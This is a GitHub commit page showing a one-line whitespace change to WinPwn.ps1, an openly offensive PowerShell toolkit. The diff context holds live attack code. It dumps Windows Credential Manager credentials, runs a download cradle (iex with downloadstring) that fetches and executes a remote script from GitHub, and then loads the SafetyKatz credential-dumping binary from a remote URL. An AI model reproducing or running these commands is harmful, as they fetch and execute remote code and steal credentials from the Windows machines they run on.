Skip to content

Commit

Permalink
Update WinPwn.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
S3cur3Th1sSh1t committed Jun 30, 2019
1 parent c4595de commit 80f359e
Showing 1 changed file with 1 addition and 2 deletions.
3 changes: 1 addition & 2 deletions WinPwn.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -409,9 +409,8 @@ function kittielocal
{
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true

}
}
else
{
Expand Down

0 comments on commit 80f359e

Please sign in to comment.